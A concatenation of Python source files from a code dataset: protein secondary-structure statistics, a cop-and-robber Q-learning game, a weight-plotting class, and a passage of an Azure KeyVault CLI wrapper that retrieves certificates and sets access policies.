len(np.bincount(E))))])\n\n for i in range(len(np.bincount(C))):\n counts['C'][i] = np.bincount(C)[i]\n for i in range(len(np.bincount(H))):\n counts['H'][i] = np.bincount(H)[i]\n for i in range(len(np.bincount(E))):\n counts['E'][i] = np.bincount(E)[i]\n\n return counts, C, H, E\n\n C=[]\n H=[]\n E=[]\n counts_all = pd.DataFrame(np.zeros((1, 3), dtype=int),\n columns=['C', 'H', 'E'],\n index=[np.arange(1)])\n\n for sample in dict.keys():\n seq = dict[sample][0].cpu().numpy()[0]\n original_len = dict[sample][1].cpu().numpy()\n mask = dict[sample][2].cpu().numpy()[0]\n mask = mask[:original_len]\n xy_idx = np.where(mask == 0.0)\n seq[xy_idx] = 3\n sequence = ''\n for i in seq:\n sequence += str(i)\n sequence = sequence[:original_len]\n sequence = sequence.replace('0', 'C')\n sequence = sequence.replace('1', 'H')\n sequence = sequence.replace('2', 'E')\n sequence = sequence.replace('3', 'X')\n counts_tmp, C_tmp,H_tmp,E_tmp = countStructureChains3(sequence)\n C.extend(C_tmp)\n E.extend(E_tmp)\n H.extend(H_tmp)\n counts_all = counts_all.append(counts_tmp)\n\n counts=counts_all.groupby(counts_all.index).sum()\n f.write('\\n')\n f.write('### DSSP3 Chains ###\\n')\n f.write('Average C, H, E: '+str(np.average(C))+' '+ str(np.average(H))+' '+ str(np.average(E)))\n f.write(counts.to_string())\n f.write('\\n')\n counts.to_pickle(statistics_dir+'/countChains3')\n tmp={'avg3':[np.average(C), np.average(H), np.average(E)]}\n attributes.update(tmp)\n\ndef countStructureChains8_dict(dict, f):\n def countStructureChains8(sequence):\n H = []\n E = []\n I = []\n T = []\n S = []\n B = []\n G = []\n none = []\n i = 0\n\n while i < len(sequence):\n tmp = sequence[i]\n cnt = 1\n\n if (i < len(sequence) - 1):\n while (sequence[i + 1] == tmp):\n cnt += 1\n i = i + 1\n if (i == len(sequence) - 1):\n break\n if (tmp == 'H'):\n H.insert(0, cnt)\n elif (tmp == 'S'):\n S.insert(0, cnt)\n elif (tmp == 'B'):\n B.insert(0, cnt)\n elif (tmp == 'G'):\n G.insert(0, cnt)\n elif (tmp == 'T'):\n T.insert(0, cnt)\n elif (tmp == 'I'):\n I.insert(0, cnt)\n elif (tmp == '-'):\n none.insert(0, cnt)\n elif (tmp == 'E'):\n E.insert(0, cnt)\n i = i + 1\n\n matrix = np.zeros((max(len(np.bincount(H)), len(np.bincount(E)), len(np.bincount(I)),\n len(np.bincount(S)), len(np.bincount(T)), len(np.bincount(G)), len(np.bincount(B)),\n len(np.bincount(none))), 8), dtype=int)\n counts = pd.DataFrame(matrix,\n columns=['H', 'E', 'I', 'S', 'T', 'G', 'B', '-'],\n index=[np.arange(\n max(len(np.bincount(H)), len(np.bincount(E)), len(np.bincount(I)),\n len(np.bincount(S)), len(np.bincount(T)), len(np.bincount(G)),\n len(np.bincount(B)),\n len(np.bincount(none))))])\n\n for i in range(len(np.bincount(H))):\n counts['H'][i] = np.bincount(H)[i]\n for i in range(len(np.bincount(E))):\n counts['E'][i] = np.bincount(E)[i]\n for i in range(len(np.bincount(I))):\n counts['I'][i] = np.bincount(I)[i]\n for i in range(len(np.bincount(S))):\n counts['S'][i] = np.bincount(S)[i]\n for i in range(len(np.bincount(T))):\n counts['T'][i] = np.bincount(T)[i]\n for i in range(len(np.bincount(G))):\n counts['G'][i] = np.bincount(G)[i]\n for i in range(len(np.bincount(none))):\n counts['-'][i] = np.bincount(none)[i]\n for i in range(len(np.bincount(B))):\n counts['B'][i] = np.bincount(B)[i]\n return counts, H, E, I, S, T, G, B, none\n\n H = []\n E = []\n I = []\n T = []\n S = []\n B = []\n G = []\n none = []\n counts_all = pd.DataFrame(np.zeros((1, 8), dtype=int),\n columns=[ 'H', 'E', 'I', 'S', 'T', 'G', 'B', '-'],\n index=[np.arange(1)])\n for sample in dict.keys():\n seq = dict[sample][0].cpu().numpy()[0]\n original_len = dict[sample][1].cpu().numpy()\n mask = dict[sample][2].cpu().numpy()[0]\n mask = mask[:original_len]\n xy_idx = np.where(mask == 0.0)\n seq[xy_idx] = 8\n sequence = ''\n for i in seq:\n sequence += str(i)\n sequence = sequence[:original_len]\n sequence = sequence.replace('0', 'H')\n sequence = sequence.replace('1', 'E')\n sequence = sequence.replace('2', 'I')\n sequence = sequence.replace('3', 'S')\n sequence = sequence.replace('4', 'T')\n sequence = sequence.replace('5', 'G')\n sequence = sequence.replace('6', 'B')\n sequence = sequence.replace('7', '-')\n sequence = sequence.replace('8', 'X')\n counts_tmp, H_tmp, E_tmp, I_tmp, S_tmp, T_tmp, G_tmp, B_tmp, none_tmp = countStructureChains8(sequence)\n E.extend(E_tmp)\n H.extend(H_tmp)\n I.extend(I_tmp)\n S.extend(S_tmp)\n T.extend(T_tmp)\n B.extend(B_tmp)\n G.extend(G_tmp)\n none.extend(none_tmp)\n counts_all = counts_all.append(counts_tmp)\n\n counts=counts_all.groupby(counts_all.index).sum()\n f.write('\\n')\n f.write('### DSSP8 Chains ###\\n')\n f.write('Average H, E, I, S, T, G, B, -: '+ str(np.average(H))+' '+ str(np.average(E))+' '+ str(np.average(I))+' '+ str(np.average(S))+' '+\n str(np.average(T))+' '+str(np.average(G))+' '+str(np.average(B))+' '+str(np.average(none))+'\\n')\n f.write(counts.to_string())\n f.write('\\n')\n counts.to_pickle(statistics_dir+'/countChains8')\n\n tmp={'avg8':[np.average(H), np.average(E),np.average(I),np.average(S),np.average(T),np.average(G),np.average(B),np.average(none)]}\n attributes.update(tmp)\n\ndef countAminoAcidsPerStruct_dict(dict3, dict8, f):\n def countAminoAcidsPerStruct8(seq, struct):\n matrix = np.zeros((9, 21), dtype=int)\n aa_counts = pd.DataFrame(matrix, # # 0:H, 1:E, 2:I, 3:S, 4:T, 5:G, 6:B, 7:-\n columns=['A', 'R', 'N', 'D', 'C', 'E', 'Q', 'G', 'H', 'I', 'L', 'K', 'M', 'F', 'P',\n 'S',\n 'T',\n 'W', 'Y', 'V', 'Else'],\n index=[np.arange(9)])\n for i in range(len(seq)):\n if (struct[i] == 'H'):\n if (seq[i] in aa_counts.keys()):\n aa_counts[seq[i]][0] += 1\n else:\n aa_counts['Else'][0] += 1\n elif (struct[i] == 'E'):\n if (seq[i] in aa_counts.keys()):\n aa_counts[seq[i]][1] += 1\n else:\n aa_counts['Else'][1] += 1\n elif (struct[i] == 'I'):\n if (seq[i] in aa_counts.keys()):\n aa_counts[seq[i]][2] += 1\n else:\n aa_counts['Else'][2] += 1\n elif (struct[i] == 'S'):\n if (seq[i] in aa_counts.keys()):\n aa_counts[seq[i]][3] += 1\n else:\n aa_counts['Else'][3] += 1\n elif (struct[i] == 'T'):\n if (seq[i] in aa_counts.keys()):\n aa_counts[seq[i]][4] += 1\n else:\n aa_counts['Else'][4] += 1\n elif (struct[i] == 'G'):\n if (seq[i] in aa_counts.keys()):\n aa_counts[seq[i]][5] += 1\n else:\n aa_counts['Else'][5] += 1\n elif (struct[i] == 'B'):\n if (seq[i] in aa_counts.keys()):\n aa_counts[seq[i]][6] += 1\n else:\n aa_counts['Else'][6] += 1\n elif (struct[i] == '-'):\n if (seq[i] in aa_counts.keys()):\n aa_counts[seq[i]][7] += 1\n else:\n aa_counts['Else'][7] += 1\n else:\n if (seq[i] in aa_counts.keys()):\n aa_counts[seq[i]][8] += 1\n else:\n aa_counts['Else'][8] += 1\n return aa_counts\n\n def countAminoAcidsPerStruct3(seq, struct):\n matrix = np.zeros((4, 21), dtype=int)\n aa_counts = pd.DataFrame(matrix, # 0:C,1:H,2:E,3:XY\n columns=['A', 'R', 'N', 'D', 'C', 'E', 'Q', 'G', 'H', 'I', 'L', 'K', 'M', 'F', 'P',\n 'S',\n 'T',\n 'W', 'Y', 'V', 'Else'],\n index=[np.arange(4)])\n for i in range(len(seq)):\n if (struct[i] == 'C'):\n if (seq[i] in aa_counts.keys()):\n aa_counts[seq[i]][0] += 1\n else:\n aa_counts['Else'][0] += 1\n elif (struct[i] == 'H'):\n if (seq[i] in aa_counts.keys()):\n aa_counts[seq[i]][1] += 1\n else:\n aa_counts['Else'][1] += 1\n elif (struct[i] == 'E'):\n if (seq[i] in aa_counts.keys()):\n aa_counts[seq[i]][2] += 1\n else:\n aa_counts['Else'][2] += 1\n else:\n if (seq[i] in aa_counts.keys()):\n aa_counts[seq[i]][3] += 1\n else:\n aa_counts['Else'][3] += 1\n return aa_counts\n\n matrix = np.zeros((4, 21), dtype=int)\n aa_counts = pd.DataFrame(matrix, # 0:C,1:H,2:E,3:XY\n columns=['A', 'R', 'N', 'D', 'C', 'E', 'Q', 'G', 'H', 'I', 'L', 'K', 'M', 'F', 'P', 'S',\n 'T',\n 'W', 'Y', 'V', 'Else'],\n index=[np.arange(4)])\n\n for sample in dict3.keys():\n seq = dict3[sample][0]\n struct = dict3[sample][1]\n aa_counts_tmp=countAminoAcidsPerStruct3(seq,struct)\n aa_counts=aa_counts.append(aa_counts_tmp)\n\n counts = aa_counts.groupby(aa_counts.index).sum()\n f.write('\\n')\n f.write('### TYPE OF AMINO ACIDS PER STRUCTURE CLASS DSSP3 ###\\n')\n f.write(counts.to_string())\n f.write('\\n')\n np.save(statistics_dir + '/countAAs3', np.array(counts))\n\n matrix = np.zeros((9, 21), dtype=int)\n aa_counts = pd.DataFrame(matrix, # 0:C,1:H,2:E,3:XY\n columns=['A', 'R', 'N', 'D', 'C', 'E', 'Q', 'G', 'H', 'I', 'L', 'K', 'M', 'F', 'P',\n 'S',\n 'T',\n 'W', 'Y', 'V', 'Else'],\n index=[np.arange(9)])\n\n for sample in dict8.keys():\n seq = dict8[sample][0]\n struct = dict8[sample][1]\n aa_counts_tmp = countAminoAcidsPerStruct8(seq, struct)\n aa_counts=aa_counts.append(aa_counts_tmp)\n\n counts=aa_counts.groupby(aa_counts.index).sum()\n f.write('\\n')\n f.write('### TYPE OF AMINO ACIDS PER STRUCTURE CLASS DSSP8 ###\\n')\n f.write(counts.to_string())\n f.write('\\n')\n np.save(statistics_dir+'/countAAs8',np.array(counts))\n\n\ndef countDistanceBetweenBetaSheets_dict(dict, f):\n def countDistanceBetweenBetaSheets(sequence):\n dist = []\n i = 0\n tmp = 0\n while i < len(sequence):\n if ((sequence[i] == 'B' or sequence[i] == 'E') and tmp > 0):\n dist.append(tmp)\n tmp = 0\n else:\n tmp += 1\n i += 1\n if (len(dist) > 0):\n del dist[0]\n\n # print('beta dist:', dist)\n return dist\n\n dist=[]\n for sample in dict.keys():\n seq = dict[sample][0].cpu().numpy()[0]\n original_len = dict[sample][1].cpu().numpy()\n mask = dict[sample][2].cpu().numpy()[0]\n mask = mask[:original_len]\n xy_idx = np.where(mask == 0.0)\n seq[xy_idx] = 3\n sequence = ''\n for i in seq:\n sequence += str(i)\n sequence = sequence[:original_len]\n sequence = sequence.replace('0', 'C')\n sequence = sequence.replace('1', 'H')\n sequence = sequence.replace('2', 'E')\n seq = sequence.replace('3', 'X')\n\n dist_tmp=countDistanceBetweenBetaSheets(seq)\n dist=dist+dist_tmp\n\n f.write('\\n')\n f.write('### AVG DISTANCE BETWEEN BETA SHEETS ###\\n')\n f.write(str(np.average(dist)))\n f.write('\\n')\n\ndef analyseFlex(dict):\n flex_avgs=[]\n three_bins=[0,0,0]\n for sample in dict.keys():\n flex=dict[sample][3]\n flex_avgs.append(np.average(flex))\n\n for f in flex:\n if(f<=-1):\n three_bins[0]+=1\n elif (f > -1 and f< 1):\n three_bins[1] += 1\n elif (f >= 1):\n three_bins[2] += 1\n\n flex_avgs=np.array(flex_avgs)\n three_bins=np.array(three_bins)\n np.save(statistics_dir+'/flex_avgs', flex_avgs)\n np.save(statistics_dir+'/flex_thirds', three_bins)\n tmp={'flex': three_bins}\n attributes.update(tmp)\n\ndef analyseSolvAcc(dict):\n solv_avgs = []\n four_bins = [0, 0, 0, 0]\n two_bins=[0,0]\n for sample in dict.keys():\n solv=dict[sample][2]\n solv_avgs.append(np.average(solv))\n\n for f in solv:\n if (f >= 0 and f < 0.25):\n four_bins[0] += 1\n two_bins[0] += 1\n elif (f >= 0.25 and f < 0.5):\n four_bins[1] += 1\n two_bins[0] += 1\n elif (f >= 0.5 and f < 0.75):\n four_bins[2] += 1\n two_bins[1] += 1\n elif (f >= 0.75 and f <= 1.0):\n four_bins[3] += 1\n two_bins[1] += 1\n\n solv_avgs = np.array(solv_avgs)\n four_bins = np.array(four_bins)\n two_bins = np.array(two_bins)\n np.save(statistics_dir + '/solvAcc_avgs', solv_avgs)\n np.save(statistics_dir + '/solvAcc_quarters', four_bins)\n np.save(statistics_dir + '/solvAcc_halfs', two_bins)\n\n tmp={'solvacc': two_bins}\n attributes.update(tmp)\n\n# Analyze DSSP3 predictions\nf = open('data analysis/predicted/statisticsPredicted.txt', 'w')\n\ndict3 = np.load('/home/areithmeier/log/multi4/3/DenseHybrid_protvec+scoringmatrix_3_multitask/predictedData.npy').item()\ncountStructures3(dict3, f)\n\ncountStructureChains3_dict(dict3, f)\ncountDistanceBetweenBetaSheets_dict(dict3, f)\n\n# Analyze DSSP8 predictions\nf = open('data analysis/predicted/statisticsPredicted8.txt', 'w')\ndict8 = np.load('/home/areithmeier/log/multi4/8/DenseHybrid_protvec+scoringmatrix_8_multitask/predictedData.npy').item()\ncountStructures8(dict8, f)\n\ncountStructureChains8_dict(dict8, f)\ncountDistanceBetweenBetaSheets_dict(dict8, f)\n\nf.close()","sub_path":"code/getStatisticsPredicted.py","file_name":"getStatisticsPredicted.py","file_ext":"py","file_size_in_byte":22796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"390403400","text":"import numpy as np\r\nimport pickle\r\nimport os\r\nimport utils\r\nfrom utils import rearrange_vector, next_positions, index_to_number\r\nfrom utils import writeSmv, runSmv\r\n\r\nBOARD_COLS = utils.BOARD_COLS\r\nBOARD_ROWS = utils.BOARD_ROWS\r\nQ_LEARNING = True\r\nPlay_Random = True\r\nDistance_Feature = False\r\n\r\n\r\n# class \"State\" holds all variable and methods related to state transformation\r\n\r\nclass State:\r\n def __init__(self, init_vec=None, p1=None, p2=None, max_turns=50, exp_rate=0):\r\n self.position = [init_vec[0], init_vec[1]]\r\n self.p1 = p1\r\n self.p2 = p2\r\n self.isEnd = False\r\n self.boardHash = None\r\n # init p1 plays first\r\n self.player_turn = 1 # 1 = Cop, -1 = Rob\r\n self.counter = 0\r\n self.max_turns = max_turns\r\n self.smv = False\r\n self.exp_rate = exp_rate\r\n self.Distance_Feature = Distance_Feature # I added a feature to help the cop to converge (and win)\r\n # by choosing the next action on distance from the robber\r\n\r\n def winner(self):\r\n if sum(self.position[1], []) in self.position[0]:\r\n return 1\r\n if self.counter > self.max_turns:\r\n return -1\r\n return None\r\n\r\n # availablePositions: assistance method to output the chosen action\r\n\r\n def availablePositions(self):\r\n positions = next_positions(self.player_turn, self.position)\r\n return positions\r\n\r\n # get unique hash of current board state\r\n def getHash(self):\r\n self.boardHash = self.position\r\n return self.boardHash\r\n\r\n def updateState(self, action):\r\n if self.player_turn == 1:\r\n self.position = [action, self.position[1]]\r\n else:\r\n self.position = [self.position[0], [action]]\r\n # switch to another player\r\n self.player_turn = -1 if self.player_turn == 1 else 1\r\n self.counter = self.counter + 1\r\n\r\n # only when game ends\r\n def giveReward(self):\r\n result = self.winner()\r\n # Backpropagate reward\r\n if result == 1:\r\n print(\"The cop caught the rob\\n\")\r\n self.p1.feedReward(100)\r\n self.p2.feedReward(-100)\r\n elif result == -1:\r\n print(\"The rob managed to escape the cop\\n\")\r\n self.p1.feedReward(-100)\r\n self.p2.feedReward(100)\r\n else:\r\n self.p1.feedReward(0)\r\n self.p2.feedReward(0)\r\n\r\n # board reset\r\n def reset(self, a_vecs=None, l_vecs=None, num_of_players=None):\r\n self.boardHash = None\r\n self.isEnd = False\r\n self.player_turn = 1\r\n\r\n # if not Play_Random or self.counter % 20 == 0:\r\n writeSmv(num_of_players, BOARD_COLS - 1, self.p1, a_vecs, l_vecs) # Run Smv on the 20'th iteration\r\n ans, wl_r = runSmv()\r\n # else:\r\n # ans = None\r\n if ans == 'win':\r\n self.isEnd = True\r\n self.smv = True\r\n return\r\n if Play_Random or np.random.uniform(0, 1) <= self.exp_rate:\r\n idx = 0\r\n while idx == 0:\r\n idx = np.random.choice(len(a_vecs))\r\n action = a_vecs[idx]\r\n else:\r\n action = ans\r\n # pl1.states_value[wl_r] = min(-1, pl1.states_value[wl_r])\r\n\r\n c_action = int(action / 100)\r\n r_action = int(action % 100)\r\n l_action = []\r\n for i in range(int(len(str(c_action)) / 2)):\r\n n = int(str(c_action)[2 * i: 2 * i + 2])\r\n l_action.append([int(n / 10), int(n % 10)])\r\n l_action = [l_action, [[int(r_action / 10), int(r_action % 10)]]]\r\n self.position = l_action\r\n self.counter = 0\r\n\r\n def play(self, rounds=100, init_pos=None, a_vecs=None, l_vecs=None, num_of_players=None):\r\n if init_pos is not None:\r\n self.position = init_pos\r\n win_arr = [0, 0]\r\n for i in range(rounds + 1): # main loop runs \"max_games\" (CaRgame.py) times\r\n if i == 0:\r\n continue\r\n if i % 1000 == 0 and i > 0:\r\n print(\"Rounds {}\".format(i))\r\n if self.smv:\r\n print(\"End after {} rounds\".format(i))\r\n break\r\n self.showBoard(True)\r\n while not self.isEnd: # if the game is not finish this part will be executing\r\n # Player 1\r\n positions = self.availablePositions()\r\n if Q_LEARNING:\r\n p1_action = self.p1.chooseAction(positions, self.player_turn, self.position, l_vecs, win_arr)\r\n else:\r\n p1_action = self.p1.chooseAction2(positions, self.player_turn, self.position, l_vecs, win_arr)\r\n self.updateState(sum(p1_action, []))\r\n board_hash = self.getHash()\r\n self.p1.addState(board_hash, l_vecs)\r\n self.showBoard()\r\n win = self.winner()\r\n if win is not None:\r\n self.giveReward()\r\n self.p1.reset()\r\n self.p2.reset()\r\n self.reset(a_vecs, l_vecs, num_of_players)\r\n if win == 1:\r\n win_arr[0] = win_arr[0] + 1\r\n else:\r\n win_arr[1] = win_arr[1] + 1\r\n break\r\n\r\n else:\r\n # Player 2\r\n positions = self.availablePositions()\r\n if Q_LEARNING:\r\n p2_action = self.p2.chooseAction(positions, self.player_turn, self.position, l_vecs, win_arr)\r\n else:\r\n p2_action = self.p2.chooseAction2(positions, self.player_turn, self.position, l_vecs, win_arr)\r\n self.updateState(p2_action)\r\n board_hash = self.getHash()\r\n self.p2.addState(board_hash, l_vecs)\r\n self.showBoard()\r\n win = self.winner()\r\n if win is not None:\r\n # self.showBoard()\r\n # ended with p2 either win or draw\r\n self.giveReward()\r\n self.winner()\r\n self.p1.reset()\r\n self.p2.reset()\r\n self.reset(a_vecs, l_vecs, num_of_players)\r\n if win == 1:\r\n win_arr[0] = win_arr[0] + 1\r\n else:\r\n win_arr[1] = win_arr[1] + 1\r\n break\r\n\r\n return win_arr\r\n\r\n # play with human\r\n def play2(self):\r\n while not self.isEnd:\r\n # Player 1\r\n positions = self.availablePositions()\r\n if positions != [0]:\r\n self.showBoard()\r\n p1_action = self.p1.chooseAction(positions)\r\n # take action and update board state\r\n self.updateState(p1_action)\r\n # check board status if it is end\r\n win = self.winner()\r\n if win is not None:\r\n if win == 1:\r\n print(self.p1.name, \"wins!\")\r\n return 1\r\n elif win == -1:\r\n print(self.p2.name, \"wins!\")\r\n return -1\r\n else:\r\n print(\"tie!\")\r\n self.reset()\r\n break\r\n\r\n else:\r\n # Player 2\r\n positions = self.availablePositions()\r\n if positions != [0]:\r\n self.showBoard()\r\n p2_action = self.p2.chooseAction(positions, self.player_turn, self.position)\r\n self.updateState(p2_action)\r\n win = self.winner()\r\n if win is not None:\r\n if win == 1:\r\n print(self.p1.name, \"wins!\")\r\n return 1\r\n elif win == -1:\r\n print(self.p2.name, \"wins!\")\r\n return -1\r\n else:\r\n print(\"tie!\")\r\n self.reset()\r\n break\r\n\r\n # showBoard: method to print the board after each action\r\n\r\n def showBoard(self, initial=False):\r\n # p1: C p2: R\r\n if initial:\r\n print(\"Initial state:\")\r\n else:\r\n print(\"Cop turn:\") if self.player_turn == -1 else print(\"Rob turn:\")\r\n a = self.position[0]\r\n b = self.position[1]\r\n # print('-----')\r\n out = []\r\n for i in range(BOARD_ROWS):\r\n out += [[]]\r\n for j in range(BOARD_COLS):\r\n out[i] += [\"-\"]\r\n for ap in a:\r\n out[ap[0]][ap[1]] = 'C'\r\n if sum(b, []) not in a:\r\n # if len(sum(b, [])) == 1:\r\n # b = sum(b, [])\r\n out[b[0][0]][b[0][1]] = 'R'\r\n for i in range(BOARD_ROWS):\r\n for j in range(BOARD_COLS):\r\n if i != 0 and j != 0:\r\n print(out[i][j], end=\" \")\r\n print(\"\")\r\n print('\\n')\r\n\r\n\r\nclass Player:\r\n def __init__(self, name, exp_rate=0.3):\r\n self.name = name\r\n self.states = [] # record all positions taken\r\n self.lr = 0.2\r\n self.exp_rate = exp_rate\r\n self.decay_gamma = 0.9\r\n self.states_value = {} # state -> value\r\n\r\n @staticmethod\r\n def getHash(board):\r\n boardHash = str(board.reshape(BOARD_COLS * BOARD_ROWS))\r\n return boardHash\r\n\r\n # INPUT: 1. Player class 2. possible positions as we received from \"next_positions\" (utils.py)\r\n # 3. cop / rob turn ( 1 or -1) 4. current position ( 6-digits vector)\r\n # 5. l_v = shorter version of a_v that span the board dimension\r\n # OUTPUT: The chosen action - the action that going to execute\r\n\r\n # I added the win_arr to the function calling to use it for the\r\n # distance feature implementation\r\n\r\n def chooseAction(self, positions, pl_turn, current_position, l_v, win_arr):\r\n if positions is None:\r\n return sum(current_position[np.maximum(0, -pl_turn)], [])\r\n idx = np.random.choice(len(positions)) # choose randomly index from possible actions\r\n action = positions[idx]\r\n if np.random.uniform(0, 1) <= self.exp_rate: # the main implementation of exploration rate\r\n # take random action\r\n idx = np.random.choice(len(positions))\r\n action = positions[idx]\r\n else:\r\n value_max = -999\r\n if Distance_Feature: # if we use the distance feature, initial value is set\r\n min_distance = (BOARD_ROWS - 2) * 2\r\n for p in positions:\r\n if pl_turn == 1: # cops turn\r\n cop_po = index_to_number(sum(p, []))\r\n rob_po = index_to_number(current_position[1])\r\n else:\r\n cop_po = index_to_number(current_position[0])\r\n rob_po = index_to_number([p])\r\n next_boardHash = rearrange_vector(cop_po * 100 + rob_po)\r\n if next_boardHash not in l_v:\r\n next_boardHash = utils.findEqual(next_boardHash, l_v)\r\n value = 0 if self.states_value.get(next_boardHash) is None else self.states_value.get(next_boardHash)\r\n # print(\"value\", value)\r\n if not Play_Random and pl_turn == 1 and win_arr[0] < 60 and Distance_Feature:\r\n Distance = abs((cop_po % 10) - (rob_po % 10)) + abs(int(cop_po / 10) - int(rob_po / 10))\r\n if Distance < min_distance:\r\n min_distance = Distance\r\n action = p\r\n else:\r\n if value >= value_max:\r\n value_max = value\r\n action = p\r\n\r\n # print(\"{} takes action {}\".format(self.name, action))\r\n return action\r\n\r\n @staticmethod\r\n def chooseAction2(positions, pl_turn, current_position):\r\n if positions is None:\r\n return sum(current_position[np.maximum(0, -pl_turn)], [])\r\n idx = np.random.choice(len(positions))\r\n action = positions[idx]\r\n if pl_turn == 1:\r\n opt_value = 100\r\n else:\r\n opt_value = 0\r\n\r\n # find the 2 closest\r\n for p in positions:\r\n if pl_turn == 1:\r\n cop_po = sum(p, [])\r\n rob_po = current_position[1]\r\n else:\r\n cop_po = current_position[0]\r\n rob_po = [p]\r\n cop_po_x = cop_po[0][0]\r\n cop_po_y = cop_po[0][1]\r\n rob_po_x = rob_po[0][0]\r\n rob_po_y = rob_po[0][1]\r\n dist = (cop_po_x - rob_po_x) ** 2 + (cop_po_y - rob_po_y) ** 2\r\n if pl_turn == 1:\r\n if dist < opt_value:\r\n opt_value = dist\r\n action = p\r\n else:\r\n if dist > opt_value:\r\n opt_value = dist\r\n action = p\r\n return action\r\n\r\n # append a hash state\r\n def addState(self, state, l_v):\r\n state_ul = sum(state, [])\r\n res_state = 0\r\n for i in range(len(state_ul)):\r\n res_state = res_state + index_to_number([state_ul[i]]) * (100 ** (len(state_ul) - i - 1))\r\n res_state = rearrange_vector(res_state)\r\n if res_state not in l_v:\r\n res_state = utils.findEqual(res_state, l_v)\r\n self.states.append(res_state)\r\n\r\n # at the end of game, backpropagate and update states value\r\n def feedReward(self, reward):\r\n for sta in reversed(self.states):\r\n if self.states_value.get(sta) is None:\r\n self.states_value[sta] = 0\r\n self.states_value[sta] += self.lr * (self.decay_gamma * reward - self.states_value[sta])\r\n reward = self.states_value[sta]\r\n\r\n def reset(self):\r\n self.states = []\r\n\r\n def savePolicy(self, si):\r\n fw = open('policy_' + si + '_' + str(self.name), 'wb')\r\n pickle.dump(self.states_value, fw)\r\n fw.close()\r\n\r\n def loadPolicy(self, file):\r\n fr = open(file, 'rb')\r\n self.states_value = pickle.load(fr)\r\n fr.close()\r\n\r\n def savePolicyCsv(self, numberOfGames):\r\n filename = f\"tests/test_{numberOfGames}.csv\"\r\n if os.path.exists(filename):\r\n os.remove(filename)\r\n with open(filename, 'w') as f:\r\n for key in self.states_value.keys():\r\n f.write(\"%s,%s\\n\" % (key, self.states_value[key]))\r\n\r\n\r\nclass HumanPlayer:\r\n def __init__(self, name):\r\n self.name = name\r\n\r\n @staticmethod\r\n def chooseAction(positions):\r\n while True:\r\n print(positions)\r\n # idx = int(input(\"Input your action from available positions:\"))\r\n idx = np.random.choice(len(positions))\r\n action = positions[idx]\r\n return action\r\n\r\n # append a hash state\r\n def addState(self, state):\r\n pass\r\n\r\n # at the end of game, backpropagate and update states value\r\n def feedReward(self, reward):\r\n pass\r\n\r\n def reset(self):\r\n pass\r\n","sub_path":"Class.py","file_name":"Class.py","file_ext":"py","file_size_in_byte":15237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"582233195","text":"from tools.input_tools import get_input\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom healthtools.weighttools import Weight\n\nclass Plotting:\n\n def __init__(self, dataframe):\n self.dataframe = dataframe\n\n def basic_plot(self):\n weight_df = self.dataframe\n weight = weight_df['Weight']\n \n index = weight_df['Index']\n bmi = weight_df['BMI']\n\n maximum_val = weight_df['Weight'].max()\n minimum_val = weight_df['Weight'].min()\n \n dates = [d for d in weight_df['Date']]\n \n maximum_val = maximum_val + (maximum_val / 10)\n minimum_val = minimum_val - (minimum_val / 10)\n\n fig = plt.figure()\n axis1 = fig.add_axes([0.1,0.1,0.8,0.2])\n axis2 = fig.add_axes([0.1,0.3,0.8,0.6])\n \n axis1.plot(index,bmi)\n axis2.plot(index,weight)\n \n axis2.set_title(\"Weight Monitoring\")\n axis1.set_xlabel(\"Date\")\n axis1.set_ylabel(\"BMI\")\n axis2.set_ylabel(\"Weight\")\n \n axis1.set_xticklabels(dates)\n axis2.set_xticklabels([])\n \n labels = [tick for tick in axis1.get_yticks()]\n axis1.set_yticklabels(labels[:-1])\n \n axis2.set_ylim(minimum_val, maximum_val)\n \n fig.canvas.draw()\n \n plt.savefig(\"/home/aaron/Projects/health/output/weight_vs_time.png\")\n","sub_path":"plot/base_plot.py","file_name":"base_plot.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"131241036","text":"import subprocess as sp\nimport json\nimport logging\nimport sys\n\nclass KeyVaultClientCli(object):\n\n _sp_shell_flag: bool = False\n\n # Logging preperation.\n #-----------------------------------------------------------------------------\n\n # Retrieve the main logger; picks up parent logger instance if invoked as a module.\n _logger = logging.getLogger(__name__)\n '''\n logger: Logger instance used to process all module log statements.\n '''\n\n def __init__(self):\n \n if sys.platform == \"linux\" or sys.platform == \"linux2\":\n self._sp_shell_flag = False\n elif sys.platform == \"win32\":\n self._sp_shell_flag = True\n\n def get_kv_certificate(\n self, \n kv_name: str, \n cert_name: str):\n \"\"\"Function that retrieves a certificate stored in KeyVault\n\n :param kv_name: KeyVault name\n :type kv_name: str\n :param cert_name: Certificate name\n :type cert_name: str\n \n :return: certificate (json deserialized)\n :rtype: dict\n :raises: :class:`Exception`\n \"\"\"\n\n try:\n certificate_extract_command = [\n 'az',\n 'keyvault',\n 'certificate',\n 'show',\n '--vault-name', kv_name,\n '--name', cert_name\n ]\n\n certificate_output = sp.check_output(certificate_extract_command, shell=self._sp_shell_flag, universal_newlines=True)\n\n self._logger.debug('The extract certificate command executed successfuly, producing the following output: {}'\n .format(certificate_output))\n\n # Convert the output to a json object.\n return json.loads(certificate_output)\n except sp.CalledProcessError as e:\n\n self._logger.error('It was not possible to get a certificate from KeyVault.')\n self._logger.error('The following error occurred: ' + str(e))\n sys.exit(1) # Exit the module as it is not possible to progress the deployment.\n raise(e)\n except ValueError as e:\n self._logger.error(e)\n sys.exit(1) # Exit the module as it is not possible to progress the deployment.\n raise(e)\n\n def set_aad_sp_kv_access(\n self, \n kv_name: str, \n service_principal_id: str):\n \"\"\"Function set access policy values to a KeyVault instance\n\n :param kv_name: KeyVault name\n :type kv_name: str\n :param service_principal_id: Service principal id\n :type service_principal_id: str\n \n :raises: :class:`Exception`\n \"\"\"\n\n try:\n # Add Principal To Key Vault\n #-----------------------------------------------------------------------------\n\n self._logger.debug('Adding the established aad principle application to key vault.')\n\n kv_add_principal_command = [\n 'az',\n 'keyvault',\n 'set-policy',\n '--name', kv_name,\n '--spn', service_principal_id,\n '--key-permissions', 'encrypt', 'decrypt', 'wrapKey', 'unwrapKey', 'sign',\n 'verify', 'get', 'list', 'create', 'update', 'import', 'delete', 'backup',\n 'restore', 'recover', 'purge',\n '--secret-permissions', 'get', 'list', 'set', 'delete', 'backup', 'restore',\n 'recover', 'purge',\n '--certificate-permissions', 'get', 'list', 'delete', 'create', 'import',\n 'update', 'managecontacts', 